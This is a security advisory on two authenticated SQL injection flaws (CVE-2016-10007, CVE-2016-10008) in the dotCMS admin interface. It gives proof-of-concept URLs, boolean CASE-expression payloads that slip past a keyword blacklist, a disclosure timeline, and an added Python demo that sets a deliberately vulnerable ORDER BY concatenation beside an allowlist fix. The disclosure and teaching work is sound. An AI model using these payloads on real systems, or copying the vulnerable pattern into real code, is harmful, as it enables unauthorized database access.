| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2016-10007 | 19 Feb 2018 21:00 | – | cve |
| CVE-2016-10008 | 19 Feb 2018 21:00 | – | cve |
| CVE-2016-10007 | 19 Feb 2018 21:00 | – | cvelist |
| CVE-2016-10008 | 19 Feb 2018 21:00 | – | cvelist |
| EUVD-2016-1204 | 7 Oct 2025 00:30 | – | euvd |
| EUVD-2016-1205 | 7 Oct 2025 00:30 | – | euvd |
| CVE-2016-10007 | 19 Feb 2018 21:29 | – | nvd |
| CVE-2016-10008 | 19 Feb 2018 21:29 | – | nvd |
| CVE-2016-10007 | 19 Feb 2018 21:29 | – | osv |
| CVE-2016-10008 | 19 Feb 2018 21:29 | – | osv |
Title: Multiple SQL injection vulnerabilities in dotCMS (2x CVE)
Credit: Elar Lang / https://security.elarlang.eu
Vendor/Product: dotCMS (http://dotcms.com/)
Vulnerability: SQL injection
Vulnerable version: before 4.1.1. Theoretically would be fixed in 3.7.2 (not released yet)
CVE: CVE-2016-10007, CVE-2016-10008
# Multiple SQL injections in dotCMS framework.
I had already reported 8 SQL injection vulnerabilities to dotCMS and I
was curious as to how they fixed them.
While checking the fixes I found 2 new vulnerabilities, but for those I had
to bypass a blacklist defence.
## CVE-2016-10007 - "Marketing > Forms" page, _EXT_FORM_HANDLER_orderBy parameter
An SQL injection vulnerability in the "Marketing > Forms" screen in
dotCMS before 3.7.2 (not released) and 4.1.1 allows remote
authenticated attackers to execute arbitrary SQL commands via the
_EXT_FORM_HANDLER_orderBy parameter.
Preconditions: the attacker must be authenticated and authorized as an
administrator.
Proof-of-Concept URL (from "Admin Site" UI: "Marketing > Forms", click
on some column title in the resultset table):
/c/portal/layout?p_l_id=89594b95-1354-4a63-8867-c922880107df&p_p_id=EXT_FORM_HANDLER&p_p_action=1&p_p_state=maximized&p_p_mode=view&_EXT_FORM_HANDLER_struts_action=%2Fext%2Fformhandler%2Fview_form&_EXT_FORM_HANDLER_orderBy=SQLi&_EXT_FORM_HANDLER_direction=asc
Proof-of-Concept values for parameter _EXT_FORM_HANDLER_orderBy.
Precondition for this example: there must be at least 2 different rows
in the resultset and ordering by name and description field should
give different ordering (if they don't, use some other field names)
-- boolean true - output is ordered by name field
_EXT_FORM_HANDLER_orderBy=case when 1=1 then name else description end
-- boolean false - output is ordered by description field
_EXT_FORM_HANDLER_orderBy=case when 1=0 then name else description end
## CVE-2016-10008 - "Content Types > Content Types" page, _EXT_STRUCTURE_direction parameter
An SQL injection vulnerability in the "Content Types > Content Types"
screen in dotCMS before 3.7.2 (not released) and 4.1.1 allows remote
authenticated attackers to execute arbitrary SQL commands via the
_EXT_STRUCTURE_direction parameter.
Preconditions: the attacker must be authenticated and authorized as an
administrator.
Proof-of-Concept URL (from "Admin Site" UI: "Content Types > Content
Types", click on some column title in the resultset table):
demo.dotcms.com/c/portal/layout?p_l_id=56fedb43-dbbf-4ce2-8b77-41fb73bad015&p_p_id=EXT_STRUCTURE&p_p_action=1&p_p_state=maximized&p_p_mode=view&_EXT_STRUCTURE_struts_action=%2Fext%2Fstructure%2Fview_structure&_EXT_STRUCTURE_orderBy=velocity_var_name&_EXT_STRUCTURE_direction=SQLi
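Both issues above share one root cause: `ORDER BY` column names and sort directions cannot be bound as prepared-statement parameters, so the request value ends up concatenated into the SQL string, and a keyword blacklist in front of that concatenation does not stop an expression such as the `case when ... end` payload from the CVE-2016-10007 PoC. The following is an added example, not code from the advisory or from dotCMS: it reproduces the boolean-based ordering change against a constructed SQLite table, using a hypothetical keyword blacklist (not dotCMS's real filter), and places the hardened allowlist-mapping pattern beside it, which covers both the orderBy and the direction parameter.

```python
import sqlite3

# Constructed sample rows standing in for a dotCMS result set; not dotCMS's schema.
ROWS = [("zeta", "alpha"), ("alpha", "beta"), ("mid", "gamma")]

# Hypothetical keyword blacklist, constructed for illustration only.
BLACKLIST = ("select", "union", "insert", "update", "delete", "drop", "--", ";", "/*")


def _run(sql):
    """Create the in-memory table and return the 'name' column in result order."""
    conn = sqlite3.connect(":memory:")
    try:
        conn.execute("CREATE TABLE form (name TEXT, description TEXT)")
        conn.executemany("INSERT INTO form VALUES (?, ?)", ROWS)
        return [row[0] for row in conn.execute(sql)]
    finally:
        conn.close()


def blacklist_ok(value):
    """Blacklist check: rejects known keywords but lets any other SQL expression through."""
    low = value.lower()
    return not any(bad in low for bad in BLACKLIST)


def vulnerable_order(order_by, direction):
    """Vulnerable pattern: ORDER BY cannot be parameterised, so the request
    value is concatenated into the statement after only a blacklist check.
    A CASE expression contains no blacklisted keyword, so it reaches the DB
    and the sort order leaks the truth of the condition."""
    if not (blacklist_ok(order_by) and blacklist_ok(direction)):
        raise ValueError("rejected by blacklist")
    return _run(f"SELECT name, description FROM form ORDER BY {order_by} {direction}")


# Allowlists: map the request value to a server-side constant; anything else is rejected.
ALLOWED_COLUMNS = {"name": "name", "description": "description"}
ALLOWED_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def hardened_order(order_by, direction):
    """Hardened pattern: only allowlisted identifiers ever reach the SQL string.
    The request value is used as a lookup key, never as SQL text."""
    try:
        column = ALLOWED_COLUMNS[order_by.strip().lower()]
        dir_sql = ALLOWED_DIRECTIONS[direction.strip().lower()]
    except KeyError:
        raise ValueError("orderBy/direction not in allowlist")
    return _run(f"SELECT name, description FROM form ORDER BY {column} {dir_sql}")


if __name__ == "__main__":
    payload_true = "case when 1=1 then name else description end"
    payload_false = "case when 1=0 then name else description end"
    print("vulnerable, 1=1:", vulnerable_order(payload_true, "asc"))
    print("vulnerable, 1=0:", vulnerable_order(payload_false, "asc"))
    try:
        hardened_order(payload_true, "asc")
    except ValueError as exc:
        print("hardened:", exc)
```

Run stand-alone, the vulnerable path returns the rows sorted by `name` for the `1=1` payload and by `description` for the `1=0` payload, which is exactly the observable difference the PoC above relies on, while the hardened path raises before any SQL is built. The same lookup-table approach applies to the `_EXT_STRUCTURE_direction` parameter of CVE-2016-10008, where the only legitimate inputs are the two sort directions.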
# Vulnerability Disclosure Timeline
2016-10-24 | me > dotCMS | SQLi Poc
2016-10-25 | dotCMS > me | Thanks for PoC
2016-12-19 | me > dotCMS | Informed CVE numbers, asked status for
reported issues.
2016-12-19 | dotCMS > me | Low priority, not planning fixing in next release
2016-12-19 | me > dotCMS | agreed with low priority (requires
authenticated user in administrator privileges)
2017-03-03 | me > dotCMS | I can see many new releases, is it fixed? [2]
2017-03-06 | dotCMS > me | No. Probably will not be addressed until
the project to refactor our admin interface is completed.
2017-06-16 | dotCMS | dotCMS version 4.1.1 release
2017-07-18 | me > dotCMS | As I need to publish CVEs at some point,
what is the status?
2017-07-21 | dotCMS > me | Fixes are available on 4.1.1. Would it be
possible to wait 3 to 4 weeks so we can release 3.7.2?
2017-10-10 | me > dotCMS | "3 to 4 weeks" passed, how is it going with 3.7.2?
2017-10-17 | dotCMS > me | "Thank you for your patience! Thank you for
your email! It prompted me to push the developer to finish getting
this release out the door. I will email you next week with an update."
This "next week" never arrived ;)
2018-02-11 | me | Full Disclosure on http://security.elarlang.eu
# Related fixes and releases
https://dotcms.com/docs/latest/change-log#release-4.1.1
# More detailed description (incl. some code review and blacklist bypass) is available in blog:
https://security.elarlang.eu/cve-2016-10007-and-cve-2016-10008-2-sql-injection-vulnerabilities-in-dotcms-blacklist-defence-bypass.html
--
Elar Lang
Blog @ https://security.elarlang.eu
Pentester, lecturer @ http://www.clarifiedsecurity.com